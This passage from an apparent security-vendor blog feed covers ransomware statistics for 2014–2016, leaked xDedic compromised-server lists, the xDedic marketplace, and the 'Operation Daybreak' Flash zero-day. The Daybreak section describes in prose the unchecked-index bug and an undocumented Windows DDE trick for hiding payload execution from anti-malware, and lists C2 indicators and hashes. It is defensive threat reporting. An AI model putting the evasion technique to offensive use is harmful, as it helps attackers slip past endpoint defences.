magnitude of the risk facing our everyday financial transactions. If you have never took part of a BSides event before, I highly encourage it. Each one is different, and it’s one of those experiences in life where you get what you put in. There are of course various drinks available during the entire day, and music can always be heard in the background. Come for the talks, the workshops, the people, or to visit a beautiful city in Latin America, you won’t regret it. ### KSN Report: Ransomware from 2014-2016 Wed, 06/22/2016 - 06:59 Executive summary and main findings Ransomware is a type of malware that, upon infecting a device, blocks access to it or to some or all of the information stored on it. In order to unlock either the device or the data, the user is required to pay a ransom, usually in bitcoins or another widely used e-currency. This report covers the evolution of the threat over the last two years. Methodology: This report has been prepared using depersonalized data processed by Kaspersky Security Network (KSN). The metrics are based on the number of distinct users of Kaspersky Lab products with the KSN feature enabled who encountered ransomware at least once in a given period. The term ransomware covers mainly two types of malware: so-called Windows blockers (they block the OS or browser with a pop-up window) and encryption ransomware. The term also includes select groups of Trojan-Downloaders, namely those that tend to download encryption ransomware upon infection of a PC. Nowadays, encryption ransomware is widely regarded as synonymous with ransomware, although, according to Kaspersky Lab statistics the number of users that regularly encounters blockers remains high. Main findings: • The total number of users who encountered ransomware between April 2015 and March 2016 rose by 17.7% compared to the previous 12 months (April 2014 to March 2015) – from 1,967,784 to 2,315,931 users around the world; • The proportion of users who encountered ransomware at least once out of the total number of users who encountered malware rose 0.7 percentage points, from 3.63% in 2014-2015 to 4.34% in 2015-2016; • Among those who encountered ransomware, the proportion who encountered cryptors rose dramatically – up 25 percentage points, from 6.6% in 2014-2015 to 31.6% in 2015-2016; • The number of users attacked with cryptors rose 5.5 times, from 131,111 in 2014-2015to 718,536 in 2015-2016; • The number of users attacked with Win-lockers decreased 13.03%, from 1,836,673 in 2014-2015 to 1,597,395 in 2015-2016; • The number of users attacked with mobile ransomware grew almost 4 times: from 35,413 users in 2014-2015 to 136,532 users in 2015-2016. Introduction: A brief history of ransomware Although it has only now started to attract the widespread attention of the media and the security community, ransomware (including crypto-ransomware) as a type of malware has been known about for years: at least since 1989 when the first-known malware capable of encrypting file names (the AIDS Trojan) was discovered. Another example of extortion malware was discovered by security researchers as long ago as the middle 2000s. This was the Gpcode malware, capable of encrypting files on infected machines with its own encryption algorithm. Gpcode was followed by several other families, like Krotten, Cryzip etc. From time to time another copycat or slightly different version of Gpcode emerged. The appearance of such programs would provoke relatively small incidents, but never resulted in something that looked anything like an epidemic. This situation remained unchanged for years. The Blockers epidemic The first real ransomware epidemic started in 2010 with thousands of home users in Russia and some neighboring countries encountering cryptic windows that covered all other windows on their desktop. These windows usually contained a message from criminals asking the victim to send money to a given Premium-SMS number in order to unlock the screen or browser of their infected PC. The scale of the problem turned out to be so great and the number of victims so significant that it prompted law enforcement agencies to become involved and gained extensive media coverage in Russia, from television to the blogosphere. Mobile phone operators did what they could to combat the threat, introducing new rules for registering and operating premium-rate (short) numbers, blocking accounts that had been used to perpetrate fraud and informing their customers about this type of fraud. In late August 2010, several people were arrested in Moscow and accused of creating blockers. According to the Russian Ministry of the Interior, the illegal income generated by the criminal group was estimated at 500 million rubles (about 12.5 million euros). The rise of so-called blockers was powered mainly by the fact that the creation of malware capable of blocking an OS browser or desktop did not require significant programming skills and generated a relatively reliable income for the criminal. Comparatively easy DIY sets for creating blockers were available on underground forums and this attracted a lot of low-level cybercriminals. The security industry and law enforcement agencies reacted quickly: the arrest of the group, combined with the release of a number of services offering the free unlocking of locked systems made criminal efforts to extort money in this way both more risky and less profitable. Nevertheless, blockers remain on the threat landscape to this day – as illustrated in this report. At the end of 2010, Kaspersky Lab researchers predicted that despite the arrests, the problem was unlikely to go away. Cybercriminals, the experts predicted, would simply use other methods to receive payment for ‘unblocking’ their victims’ computers, such as electronic money systems. That is exactly what happened several years later when ransomware’s big comeback began. Ransomware returns with encryption The biggest difference between the two types of ransomware: blockers and encryption ransomware is that blocker damage is fully reversible. Even in the worst case scenario, the owner of an infected PC could simply reinstall the OS to get all their files back. In addition, the way in which blockers work allowed security researchers to develop automated technologies that help to fight against blockers even after infection. One such patented technology is implemented in Kaspersky Lab products and it basically puts a stop to the blocker threat for Kaspersky Lab clients. However, when it comes to encryption ransomware things are much more complicated because the encrypted files are impossible to decrypt without a special key, which is usually stored on the cybercriminals’ servers. This makes it more important than ever to take a proactive approach to protection. The severity of the consequences of successful infection is one of the reasons why encryption ransomware is enjoying a resurgence in popularity among cybercriminals. However, it is not the only one. The analysis in this report attempts to assess the scale of the problem, and to highlight possible reasons for its re-emergence almost ten years after the first encryption ransomware appeared on the threat landscape. Part 1. PC ransomware: From blockers to crypto-ransomware One doesn’t need to look at the statistics to see that ransomware is once again a major problem for Internet users. You only need to read or watch the news. Nevertheless, the statistics help to show how big the problem is and whether there are aspects to the problem that you won’t learn from yet another news story about yet another ransomware infection. The total number of users who encountered ransomware over the12 month period from April 2015 to March 2016 grew by 17.7% in comparison to the previous year: April 2014 to March 2015 – from 1,967,784 to 2,315,931 users around the world The proportion of users who encountered ransomware at least once out of the total number of users who encountered malware rose 0.7 percentage points, from 3.63% in 2014-2015 to 4.34% in 2015-2016. The following graphs illustrate the change in the number of users encountering ransomware at least once in the 24 month period covered by the report. As can be seen in Fig. 1, the prevalence of ransomware has been sporadic, rising and falling every few months. The rise in the use of crypto-malware has been more consistent: showing a steady increase in the number of attacked users, particularly from March 2015, before peaking in December 2015. Interestingly enough, from October 2015, all other types of ransomware were declining dramatically in number and by the turn of the year just a very small number of users encountered old school blockers and other non-encrypting ransomware. Fig. 1: The number of users encountering ransomware (including Encryptors and Downloaders that load encryptors) at least once in the period from April 2014 to March 2016 The decline did not last long. In February 2016, both categories started to recover from the dramatic fall in January, and numbers continue to rise. Fig. 2: Number of users attacked with any malware 2014-2016 As seen in Fig. 2, the behavior of ransomware does not reflect overall attack trends. To discover the possible reasons behind the peaks and troughs we need to look deeper into the ransomware attack statistics. The first main spike in the period under investigation was registered in July 2014 with more than 274 thousand users encountering some form of ransomware. The main reason for this surge was the Trojan-Ransom.JS.SMSer.pn, a browser-locker that attacked more than one-in-three (31%) those affected by ransomware that month. Encryptors were encountered by one-in-ten (11.63%) of all those who faced malware from the Trojan-Ransom category. The next peak was registered in April 2015, when 282.5 thousand users were attacked with ransomware. This was provoked by several groups of malware, and about 10% of those affected encountered encryption ransomware. October 2015 saw ransomware achieve an all-time-high with more than 428.4 thousand users attacked. Of those affected, 9.38% were hit with encryption ransomware. In March 2016, when another surge of ransomware attacks took place, the situation was very different: over half (51.9%) of those who encountered Trojan-Ransom malware were dealing with encryptors. This was mostly due to the activity of a small number of ransomware groups led, among others, by the infamous TeslaCrypt encryption ransomware. The results for April and May 2016 – although beyond the scope of this report – confirm this trend: encryption ransomware affected 54% of attacked users in April 2016 and 35.7% in May, still well above the average for the previous 12 months. Main actors of encryption ransomware Looking at the malware groups that were active in the period covered by this report, it appears that a rather short list of suspects is responsible for most of the trouble caused by crypto-ransomware. In the first period, from April 2014 to March 2015, the most actively propagated encryptors were the following groups of malware: CryptoWall, Cryakl, Scatter, Mor, CTB-Locker, TorrentLocker, Fury, Lortok, Aura, and Shade. Between them they were able to attack 101,568 users around the world, accounting for 77.48% of all users attacked with crypto-ransomware during the period. Fig. 3: Distribution of users attacked with different groups of encryption ransomware in 2014-2015 A year later the situation had changed considerably. TeslaCrypt, together with CTB-Locker, Scatter and Cryakl were responsible for attacks against 79.21% of those who encountered any crypto-ransomware. Fig. 4: Distribution of users attacked with different groups of encryption ransomware in 2015-2016 Interestingly, in 2015-2016 the “Others” category decreased to 2.41% of attacked users while a year earlier it had accounted for 22.55%. This drop could be a sign of the development of criminal-to-criminal infrastructure. Instead of developing their own, unique crypto-ransomware, criminals started to purchase off-the-shelf, ready-to-use malware. You can read more about this process in the “How it is done” section of this report. But before that, let’s see what kind of users the malicious actors behind ransomware were after. Type of users attacked with ransomware Most ransomware attacks are directed at home users. That was the case with the 2010-blockers epidemic in post-soviet territories, and also for the first period covered by this report. 93.2% of the users who encountered ransomware were users of home products, while the remaining 6.8% were corporate users. In the second period, however, the share of corporate users attacked with ransomware more than doubled to 13.13%, a rise of over 6 percentage points. All “thanks to” encryption ransomware. Fig. 5: Type of users encountering ransomware in 2014-2016 When looking at crypto-ransomware, the situation is different: throughout the 24 months covered by the report the share of corporate users attacked with encryptors remained steady at about 20% (rising only slightly to 22.07% in 2015-2016). But this apparent stability is not reflected in the actual numbers. The number of corporate users attacked with crypto-ransomware increased nearly six-fold (5.86 times): from 27 thousand in 2014-2015 to 158.6 thousand in 2015-2016, with home users hit nearly as hard: up 5.37 times. Geography When analyzing the geography of attacked users, it is important to bear in mind that the numbers are influenced by the distribution of Kaspersky Lab’s customers around the world. As a result, in order to understand accurately where most of the users attacked with ransomware lived, we use special metrics: the percentage of users attacked with ransomware as a proportion of the users attacked with any kind of malware. We believe this gives a much more precise picture of the threat landscape than direct comparison between users hit by ransomware in each territory. In 2014-2015, the list of countries with the highest share of users attacked with ransomware looked as follows. Country % of users attacked with ransomware, out of all users encountering malware Kazakhstan 6.99% Algeria 6.23% Ukraine 5.87% Italy 4.69% Russian Federation 4.63% Vietnam 3.86% India 3.77% Germany 3.00% Brazil 2.60% United States 2.07% Fig. 6: The list of countries with the biggest share of users attacked with ransomware as a proportion of all users attacked with any kind of malware in 2014-2015 Kazakhstan, Algeria, Ukraine, Italy and Russia led the list with the percentage of attacked users exceeding 4%. One year later, the situation had changed significantly: India moved from 7th to 1st place, with 9.6% of users. The share of Russian users also rose to 6.41%, followed by Kazakhstan, Italy, Germany, Vietnam and Algeria. In the previous year these countries were all in the second half of the Top 10. Country % of users attacked with ransomware out of all users encountering malware India 9.60% Russian Federation 6.41% Kazakhstan 5.75% Italy 5.25% Germany 4.26% Vietnam 3.96% Algeria 3.90% Brazil 3.72% Ukraine 3.72% United States 1.41% Fig. 7 the list of countries with the biggest share of users attacked with ransomware as a proportion of all users attacked with any kind of malware in 2015-2016 Of these, India, Brazil, Russia and Germany lead the list of countries with the biggest growth in the number of attacked users, while the number in the US, Vietnam, Algeria, Ukraine and Kazakhstan has notably decreased. Country 2014-2015 2015-2016 Y-to-Y change Russian Federation 562190 867651 up 54.33% India 143973 325638 up 126.18% United States 107755 55679 down 48.33% Germany 102289 138750 up 35.65% Vietnam 96092 89247 down 7.12% Ukraine 69220 39246 down 43.3% Kazakhstan 62719 39179 down 37.53% Algeria 61623 38530 down 37.43% Italy 49400 59130 up 19.7% Brazil 43674 70078 up 60.46% Fig. 8 the year-to-year change in the number of users attacked with any type of ransomware The above numbers are evidence of the change in the whole Trojan-Ransom category. If we look deeper into the share of users attacked with Trojan-Ransom who experienced an attack by encryption ransomware, the picture becomes significantly different. Country % of users attacked with encryption ransomware in 2014-2015 % of users attacked with encryption ransomware in 2015-2016 Russian Federation 6.09% 20.43% India 3.34% 6.93% United States 14.27% 39.79 % Germany 4.64% 94.41% Vietnam 2.32% 22.87 % Ukraine 1.34% 28.86% Kazakhstan 1.14% 25.59% Algeria 1.18% 13.48 % Italy 8.93% 89.7% Brazil 2.56% 31.83% Other 41.16% 46.3% Fig. 10: The year-on-year change in the share of users attacked with encryption ransomware as a proportion of users attacked with any kind of ransomware. The ten countries above accounted for 64.14% of all users who encountered any kind of ransomware, and 52.83% of those who encountered cryptors. In 2015-2016 these figures rose to 64.57% and 61.32% respectively. It is clear from Fig. 10 that during 2014-2015 encryption ransomware was, in most countries (except the US) yet another type of ransomware, with a relatively small percentage of attacked users. A year later, encryption ransomware became much more visible on the threat landscape, increasing its share of attacks by well over 20% in some countries (the US, Brazil, Kazakhstan, Ukraine, Vietnam and Russia). And for some countries, like Germany and Italy, encryption ransomware became almost synonymous with the Trojan-Ransom category. To conclude the issue of geography, we can say that while, overall, the share of users attacked with malware from Trojan-Ransom barely changed, the actual number of attacked users increased by double digits. Although in some countries the exact number of users attacked with any type of ransomware decreased, there is no country in the list that showed a decrease in the share of users attacked with encryption ransomware. This of course doesn’t give a clear answer to the question: Did the actual number of users attacked with encryption ransomware actually increase in these countries or is the increase in the share of users attacked with encryption simply the result of a declining number of users being attacked with blockers? As can be seen in Fig. 11, the answer is yes, and in some countries, like Germany, Brazil, Ukraine, Kazakhstan and Italy, the growth rate was extremely high, which obviously means that users, especially in these countries should be extremely cautious when surfing the web. Country 2014-2015 2015-2016 Year-to-Year Change (times) Russian Federation 34226 177249 +5,18 India 4803 22572 +4,70 United States 15380 22155 +1,44 Germany 4744 96566 +20,36 Vietnam 2230 20409 +9,15 Ukraine 925 11257 +12,17 Kazakhstan 716 10025 +14,00 Algeria 728 5195 +7,14 Italy 4412 53039 +12,02 Brazil 1116 22307 +19,99 Others 61853 277962 +4,49 Fig. 11: the year-on-year growth rate of users attacked with encryption ransomware in the top 10 countries with a higher proportion of such users. If you’re a victim of ransomware, visit our NoRansom site for decryption tools and further learning. ### The Tip of the Iceberg: An Unexpected Turn in the xDedic Story Mon, 06/20/2016 - 07:32 Introduction Last week we reported on the xDedic underground marketplace that facilitated the selling and buying of access to compromised RDP servers. We counted over 70,000 hacked server accounts from 173 countries for sale on the marketplace. After the public announcement the xDedic website very quickly went offline, thanks to the cooperation of several major ISPs. However, it seems that this was not the end of the story. The day after the announcement, an anonymous source from a Lithuanian IP address posted an unusual comment on our blog using the alias “AngryBirds.” We usually take such comments with a pinch of salt and generally don’t pay too much attention to comments with strange links. However, this time the links pointed to a series of pastes on the popular resource Pastebin, which in turn contained long lists of IP addresses and date information. One such paste contains about 19,000 records. The author of the comment mentioned that the list of pastes is related to hacked servers from the xDedic marketplace. At first glance it looked real – the earliest date was close to the time when the first servers were listed on xDedic (according to our records the first server was added in November 2014). However, we were slightly sceptical and decided to validate the list before making use of it. With this blogpost we share the results of that validation and our thoughts on the data we received. We have collected and concatenated all the pastes in one list: it contains around 176,000 unique records from October 2014 to February 2016. Validation Challenge The first problem we faced is that we didn’t have full IP addresses from the xDedic marketplace, because the marketplace revealed only first two octets of each IP. We had some data from the sinkhole, but this was just part of the full xDedic dataset and related to the operation of a single criminal (group) relying on the SSCLIENT backdoor that we managed to sinkhole. The problem becomes even worse when you consider the fact that our sinkhole data starts from the end of March 2016 while the Pastebin dataset ends at the end of February 2016. Theoretically, we can’t provide a strong validation of the submitted data. Nevertheless, we decided to do our best. One way of comparing the datasets was to check the correlation between the numbers of servers added monthly, so we combined them into one chart, seen below: The orange bars show the number of servers added to the marketplace while the blue bars show the IPs found on Pastebin. There is a weak but still recognizable correlation between the two datasets starting from June 2015. We have no solid theory as to why this began in June 2015, but one thought is that the developers of xDedic introduced a major change to the platform code around that time which somehow affected the server information displayed. Another check we did was to see how much the Pastebin dataset overlaps with our data from the sinkhole. As mentioned above, the sinkhole data started coming in at the end of March 2016 while Pastebin data ends in February, leaving a one month gap between the two datasets. However, we should still see an element of overlap considering that some servers could have been resold on the marketplace. And so it turned out: 1,303 unique IP addresses were found both in our sinkhole data and in the Pastebin data. Next, we decided to check how many of the reported IP addresses from the Pastebin dataset were RDP servers. So we simply scanned known IPs for the most popular RDP ports. The results were quite impressive: 71,784 IPs had the RDP service running on port range 3300-3400 (most of them were on standard port 3389). Finally, we decided to compare the list of subnets, based on the first two octets we had from the marketplace before March 2016 and check to see if these subnets were part of the Pastebin data too. The results were astonishing: Subnets from marketplace before March’16 Subnets that matched Pastebin dataset 8,721 8,718 There were only three IPs on the marketplace which didn’t make it into Pastebin dump. We checked those and found that they were added on 29th of February 2016. We assume that these three IPs (subnets) were added at the end of the day, right after the Pastebin dump ended. Aftermath We sorted the Pastebin IPs by the country they belong to and got a different picture compared to what we saw previously. Here is the new TOP 10 (new countries marked in bold): Marketplace TOP 10 Pastebin TOP 10 (NEW) # Country Compromised Servers Country Compromised Servers 1 Brazil 6,540 USA 60,081 2 China 5,023 United Kingdom 8,817 3 Russia 4,020 Brazil 8,770 4 India 3,488 Canada 6,112 5 Spain 3,155 France 5,973 6 Italy 3,119 Spain 5,954 7 France 2,474 Australia 5,855 8 Australia 2,448 Russia 5,608 9 South Africa 2,438 Italy 5,536 10 Malaysia 2,140 Germany 4,988 If we compare visually what we saw on the marketplace and on Pastebin: Interestingly, the number of servers hosted in the USA and the UK jump into the TOP 10 to rank first and second respectively. Also, Canada and Germany now appear in the TOP 10. This may make more sense when you consider that the marketplace data concerns only unsold offerings, while the huge Pastebin dataset could reflect a more realistic picture of all compromised servers. This suggests that the source of the data is either high-frequency monitoring of the xDedic marketplace (with access to full IP information) or someone had advanced access to the backend (be it a hosting provider or one of the developers). Meanwhile our charts from the sinkhole also had the USA, the UK and Germany in the TOP 10, which supports the fact that the real picture should have these major countries in the TOP 10. Extra Note In our earlier report we mentioned that the average server on the xDedic marketplace cost around$7-8 USD. However, many journalists asked us: “What was the most expensive server for sale on xDedic?”

When we looked at the data again we saw one server that cost $6,000 USD. In fact, only around 50 servers cost more than$50 USD, and all of them were located in the USA, from Alaska to Florida. The TOP 10 most expensive servers on xDedic marketplace were offered by a single criminal (group) with the alias “Narko“:

Subnet State City OS Date Price, USD 72.69.*.* Illinois Chicago Windows 7 03.04.2016 $6,000 50.195.*.* Massachusetts New Bedford Windows 7 12.05.2016$4,000 173.10.*.* Washington Bellevue Server 2012 R2 29.04.2016 $4,000 162.233.*.* Mississippi Lucedale Windows 7 05.04.2016$4,000 104.57.*.* Oklahoma Stratford Windows 7 10.05.2016 $4,000 97.87.*.* Michigan Davison Windows 7 24.12.2015$2,500 50.255.*.* Michigan Ypsilanti Server 2012 R2 18.03.2016 $2,000 108.58.*.* New York Hicksville Server 2008 R2 11.04.2016$2,000 74.124.*.* North Carolina Randleman Windows 7 18.04.2016 $1,500 24.178.*.* Georgia Gainesville Windows 7 08.04.2016$1,500

We can only speculate as to why these servers cost more than others, but there is no objective way to find their exact IPs because they were added to xDedic after the period covered by the Pastebin dataset.

Conclusions

If we consider the newly obtained Pastebin data as authentic this can help many organizations, companies and individuals to identify compromised servers they own. For us it was yet another confirmation that when it comes to cybercrime, we often see just the tip of the iceberg. The reason why the xDedic marketplace looked smaller to the buyer is because the most desirable servers were often sold almost as soon as they were added to marketplace, leaving only the least interesting and unwanted servers for sale.

After all the analysis we still have many questions:

• Where does the data come from?
• Why does the dataset from Pastebin not include more data from March to June 2016? That would make validation far easier.
• How many of these IPs are still compromised now?

What we can tell for sure is that the Pastebin dataset:

• Matches the timeline of the xDedic operation.
• Contains the IPs of many RDP servers.
• Contains many IPs of known compromised RDP servers.
• Shows a correlation with the dynamics of the xDedic marketplace offering.
• Contains 100% of the subnetworks we saw on the xDedic marketplace within the same timeframe.

In any case, whatever unanswered questions remain, it makes sense for the system administrators of the listed IP addresses to check carefully for a potential past compromise of their servers.

Since much of this information has already become public through the open comment on our blog post, we are releasing for national CERTs a full combined list of IPs with country code based on the GeoIP.

On the assumption that the Pastebin data provided by AngryBirds is genuine, we would like to say a formal thank you for sharing this data with us. However, there is one thing that can be improved next time, namely responsible disclosure. Making this data fully public may encourage other criminals to attack easy targets or result in the undeserved public shaming of administrators who run currently secure systems.

Had we received this information via a private channel (email, private URL, etc.), we would have been happy to relay it to CERTs and local authorities of affected countries via our established channels and partners. So we would ask that in future those who respond to our research refrain from dumping such data into the public domain. Thank you!

A full combined list of IPs with country code based on the GeoIP (.csv file)

### Operation Daybreak

Fri, 06/17/2016 - 02:00

Earlier this year, we deployed new technologies in Kaspersky Lab products to identify and block zero-day attacks. This technology already proved its effectiveness earlier this year, when it caught an Adobe Flash zero day exploit (CVE-2016-1010). Earlier this month, our technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks. We believe the attacks are launched by an APT Group we track under the codename “ScarCruft”.

ScarCruft is a relatively new APT group; victims have been observed in Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations, utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer.

Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April.

This exploit caught by our technologies highlights a few very interesting evasion methods, some of which we haven’t seen before. We describe them below.

Operation Daybreak general information

Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails. To date, we have observed more than two dozen victims for these attacks.

Although the exact attack vector remains unknown, the targets appear to receive a malicious link which points to a hacked website where the exploitation kit is hosted. The hacked web server hosting the exploit kit is associated with the ScarCruft APT and used in another line of attacks. Certain details, such as using the same infrastructure and targeting, make us believe that Operation Daybreak is being done by the ScarCruft APT group.

The ScarCruft APT group is a relatively new player and managed to stay under the radar for some time. In general, their work is very professional and focused. Their tools and techniques are well above the average. Prior to the discovery of Operation Daybreak, we observed the ScarCruft APT launching a series of attacks in Operation Erebus. Operation Erebus leverages another Flash Player exploit (CVE-2016-4117) through the use of watering hole attacks.

In the case of Operation Daybreak, the hacked website hosting the exploit kit performs a couple of browser checks before redirecting the visitor to a server controlled by the attackers hosted in Poland.

The main exploit page script contains a BASE64 decoder, as well as rc4 decryption implemented in JS.

The parameters sent to the “ap.php” script are randomly generated on each hit, so the second stage payload gets encrypted differently each time. This prevents easy detection by MD5 or signatures of the second stage payload.

The exploitation process consists of three Flash objects. The Flash object that triggers the vulnerability in Adobe Flash Player is located in second SWF delivered to the victim.

At the end of the exploitation chain, the server sends a legitimate PDF file to user – “china.pdf”. The “china.pdf” file shown to the victims in the last stage of the attack seems to be written in Korean:

Decoy document shown to victims

The document text talks about disagreements between China and “The North” over nuclear programs and demilitarization.

Vulnerability technical details

The vulnerability (CVE-2016-4171) is located in the code which parses the ExecPolicy metadata information.

This is what the structure looks like:

This structure also contains an array of item_info structures:

The documentation says the following about these structures:

“The item_info entry consists of item_count elements that are interpreted as key/value pairs of indices into the string table of the constant pool. If the value of key is zero, this is a keyless entry and only carries a value.”

In the exploit used by the ScarCruft group, we have the following item_info structures:

Item_info array in exploit object

The code that triggers the vulnerability parses this structure and, for every key and value members, tries to get the respective string object from string constant pool. The problem relies on the fact that the “.key” and “.value” members are used as indexes without any kind of boundary checks. It is easy to understand that if key or value members are larger than string constant pool array, a memory corruption problem appears. It is also important to mention that this member’s (value, key) are directly read from SWF object, so an attacker can easily use them to implement arbitrary read/write operations.

Getting object by index from constant pool without any checks

Using this vulnerability, the exploit implements a series of writes at specified addresses to achieve full remote code execution.

Bypassing security solutions through DDE

The Operation Daybreak attack employs multiple stages, which are all outstanding in some way. One of them attracted our attention because it implements a bypass for security solutions we have never seen before.

In the first stage of the attack, the decrypted shellcode executed by the exploit downloads and executes a special DLL file. This is internally called “yay_release.dll”:

Second stage DLL internal name and export

The code of this module is loaded directly into the exploited application and has several methods of payload execution. One of method uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. This uses an interesting bug in the Windows DDE component. It is not a secret that anti-malware systems trigger on special system functions that are called in the context of potential vulnerable applications to make a deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute.

For instance, such defense technologies trigger if a potentially vulnerable application such as Adobe Flash starts other untrusted applications, scripts interpreters or even the command console.

To make execution of payload invisible for these defense systems, the threat actors used the Windows DDE interface in a very clever way. First, they register a special window for it:

In the window procedure, they post WM_DDE_EXECUTE messages with commands:

Sending WM_DDE_EXECUTE message to window

The attackers used the following commands:

The main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed. This is an undocumented behavior in Microsoft Windows.

In our case, a malicious VBS was executed, which installs a next stage payload stored in CAB file:

Malicious VBS used in the attack

We have reported this “creative” abuse of DDE to Microsoft’s security team.

The final payload of the attack is a CAB file with the following MD5:

• 8844a537e7f533192ca8e81886e70fbc

The MS CAB file (md5: 8844a537e7f533192ca8e81886e70fbc) contains 4 malicious DLL files:

MD5 Filename a6f14b547d9a7190a1f9f1c06f906063 cfgifut.dll e51ce28c2e2d226365bc5315d3e5f83e cldbct.dll 067681b79756156ba26c12bc36bf835c cryptbase.dll f8a2d4ddf9dc2de750c8b4b7ee45ba3f msfte.dll

The file cldbct.dll (e51ce28c2e2d226365bc5315d3e5f83e) connects to the following C2:

The modules are signed by an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited” with serial numbers, copied from real Tencent certificates:

• 5d 06 88 f9 04 0a d5 22 87 fc 32 ad ec eb 85 b0
• 71 70 bd 93 cf 3f 18 9a e6 45 2b 51 4c 49 34 0e

Invalid digital signature on malware samples

The malware deployed in this attack is extremely rare and apparently reserved only for high profile victims. Our products detect it as well as other malware from ScarCruft as HEUR:Trojan.Win32.ScarCruft.gen.

Victims:

Although our visibility is rather limited, some of the victims of these attacks include:

• A law enforcement agency in an Asian country
• One of the largest trading companies in Asia and in the world
• A mobile advertising and app monetization company in the USA
• Individuals related to the International Association of Athletics Federations
• A restaurant located in one of the top malls in Dubai

Some of these were compromised over the last few days, indicating the attackers are still very active.

Conclusions:

Nowadays, in-the-wild Flash Player exploits are becoming rare. This is because in most cases they need to be coupled with a Sandbox bypass exploit, which makes them rather tricky.

Additionally, Adobe has been doing a great job at implementing new mitigations to make exploitation of Flash Player more and more difficult.

Nevertheless, resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets.

As usual, the best defense against targeted attacks is a multi-layered approach. Windows users should combine traditional anti-malware technologies with patch management, host intrusion detection and, ideally, whitelisting and default-deny strategies. According to a study by the Australian DSD, 85% of the targeted attacks analysed could have been stopped by four simple defense strategies. While it’s impossible to achieve 100% protection, in practice and most cases all you have to do is increase your defenses to the point where it becomes too expensive for the attacker – who will just give up and move on to other targets.

Kaspersky products detect flash exploit as HEUR:Exploit.SWF.Agent.gen also our AEP (Automatic Exploit Prevention) component can successfully detect this attack. Payloads are detected with HEUR:Trojan.Win32.ScarCruft.gen verdict.

Indicators of compromise: Malicious IPs and hostnames:
• 212.7.217[.]10
• reg.flnet[.]org
• webconncheck.myfw[.]us
MD5s:

3e5ac6bbf108feec97e1cc36560ab0b6
a6f14b547d9a7190a1f9f1c06f906063
e51ce28c2e2d226365bc5315d3e5f83e
067681b79756156ba26c12bc36bf835c
f8a2d4ddf9dc2de750c8b4b7ee45ba3f
8844a537e7f533192ca8e81886e70fbc

### xDedic – the shady world of hacked servers for sale

Wed, 06/15/2016 - 06:59

Over the last two years, deep in the slums of the Internet, a different kind of underground market has flourished.

The short, cryptic name perhaps doesn’t say much about it: xDedic. However, on this obscure marketplace anyone can purchase more than 70,000 hacked servers from all around the Internet.

From government networks to corporations, from web servers to databases, xDedic provides a marketplace for buyers to find anything. And the best thing about it – it’s cheap! Purchasing access to a server located in a European Union country government network can cost as little as $6. The one-time cost gives a malicious buyer access to all the data on the server and the possibility to use this access to launch further attacks. It is a hacker’s dream, simplifying access to victims, making it cheaper and faster, and opening up new possibilities for both cybercriminals and advanced threat actors. Server purchase forum To investigate xDedic, Kaspersky Lab teamed up with a European ISP. The research allowed us to collect data about the victims and the way the marketplace operates. In May 2016, we counted 70,624 servers available for purchase, from 416 unique sellers in 173 affected countries. In March 2016, the number was about 55,000, a clear indication that the database of users and servers is carefully maintained and updated. Top countries with servers on sale Interestingly, the developers of xDedic are not selling anything themselves – instead, they have created a marketplace where a network of affiliates can sell access to compromised servers. If the truth be told, the people behind xDedic have created what appears to be a “quality” service – the forum even includes live technical support, special tools to patch hacked servers to allow multiple RDP sessions and profiling tools that upload information about the hacked servers into the xDedic database. Top 10 sellers – May 2016 So who are the xDedic sellers listed above? We have been able to identify a very specific piece of malware (SCCLIENT) which is used by one of them, and to sinkhole its C&Cs. This provided a glimpse into the operations of one of these entities, which, based on the number of victims, we suspect is either Narko, xLeon or sirr. SCCLIENT Trojan: victims’ information from sinkholing (first 12 hours) The profiling software created by the xDedic developers also collects information about the software installed on the server, such as online gambling, trading and payments. Apparently, there is strong interest in accounting, tax reporting and point-of -sale (PoS) software which open up many opportunities for fraudsters: Spam and Attacking Tools Gambling and Financial Software POS Software Advanced Mass Sender Bitvise Tunnelier DU Brute LexisNexis Spam Soft LexisNexis Proxifier Proxifier Spam Soft Full Tilt Poker iPoker Network UltraTax 2010 (2011,..,2015) Abacus Tax Software CCH tax14 (tax15) CCH Small Firm Services ChoicePoint ProSeries TAX (2014,2015) ProSystem fx Tax TAX Software 2015 Tax Praparation Tax Management Inc. Lacerte Tax PosWindows BrasilPOS POS AccuPOS POS Active-Charge POS Amigo POS Catapult POS Firefly POS ePOS POS EasiPos POS Revel POS Software (Generic) POS Toast POS QBPOS PosTerminal POS kiosk.exe POS roi.exe POS PTService.exe POS pxpp.exe POS w3wp.exe POS DpsEftX.ocx POS AxUpdatePortal.exe POS callerIdserver.exe POS PURCHASE.exe POS XPS.exe POS XChgrSrv.exe During our research, we counted 453 servers from 67 countries with PoS software installed: Servers for sale with Point-of-Sale software – May 2016 For instance, a malicious user could go to the xDedic forum, register an account, top it up with Bitcoins and then purchase a number of servers which have PoS software installed. Then, they can install PoS malware, such as Backoff to harvest credit card numbers. The possibilities are truly endless. Kaspersky Lab has reported this issue with the appropriate law enforcement agencies and is cooperating in an ongoing investigation. To read our full report on xDedic which includes IOCs, download the xDedic Marketplace Analysis PDF here. * For more information about Kaspersky Lab Intelligence Services, Threat Reports and custom threat analysis contact intelreports@kaspersky.com ### CVE-2016-4171 – Adobe Flash Zero-day used in targeted attacks Tue, 06/14/2016 - 14:38 Earlier today, Adobe published the security advisory APSA16-03, which describes a critical vulnerability in Adobe Flash Player version 21.0.0.242 and earlier versions for Windows, Macintosh, Linux, and Chrome OS: A few of months ago, we deployed a new set of technologies into our products designed to identify and block zero day attacks. These technologies already proved its effectiveness earlier this year, when they caught an Adobe Flash zero day exploit, CVE-2016-1010. Earlier this month, we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks. We believe these attacks are launched by an APT Group we call “ScarCruft”. ScarCruft is a relatively new APT group; victims have been observed in several countries, including Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations 